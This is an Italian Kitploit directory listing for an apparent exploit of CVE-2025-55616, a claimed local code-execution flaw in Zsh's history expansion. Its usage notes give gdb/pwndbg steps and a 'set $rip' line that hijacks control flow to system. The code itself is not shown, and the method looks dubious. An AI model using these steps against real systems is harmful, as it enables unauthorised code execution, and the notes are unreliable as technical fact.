Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55616 — Exploit per CVE-2025-55616, una RCE locale in Zsh tramite espressione di cronologia, che consente l'esecuzione arbitraria di codice con i privilegi dell'utente. | Kitploit
Strumenti/GitHubGitHub/livepwn/cve-2025-55616
Analisi delle VulnerabilitàExploitPenetration TestingRed TeamingBinary Exploitation
GitHublivepwn/cve-2025-55616

CVE-2025-55616

Exploit per CVE-2025-55616, una RCE locale in Zsh tramite espressione di cronologia, che consente l'esecuzione arbitraria di codice con i privilegi dell'utente.

Vedi Repository
2111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55616

Autore: Rana M.Sinan Adil

  • Vulnerabilità trovata in Zsh che porta a RCE tramite History Expression

Punti Chiave

Per eseguire questo exploit: basta cambiare l'indirizzo IP e il "p system" nell'exploit, perché l'ho provato anche sul mio secondo laptop, e per cambiarlo esegui questo comando in gdb (soprattutto in pwndbg):

$ gdb zsh -f (nel terminale)

pwndbg> run -f

username% ! (username sarà il tuo, scrivi solo ! )

username% !!11111111111 (stessa cosa qui, scrivi solo  !!11111111111 )

pwndbg> p system

dopo aver ottenuto l'indirizzo di "p system" basta cambiarlo in

la seguente riga nell'exploit:

b'set $rip =  0x7ffff7cc9110', (usa il tuo indirizzo di p system al posto di 0x7ffff7cc9110

Descrizione

Questa vulnerabilità consente ad attaccanti locali di ottenere l'Esecuzione di Codice Arbitrario (RCE) con i privilegi dell'utente che esegue il processo Zsh.

Utilizzo

python3 CVE-2025-55616.py
Scarica lo strumento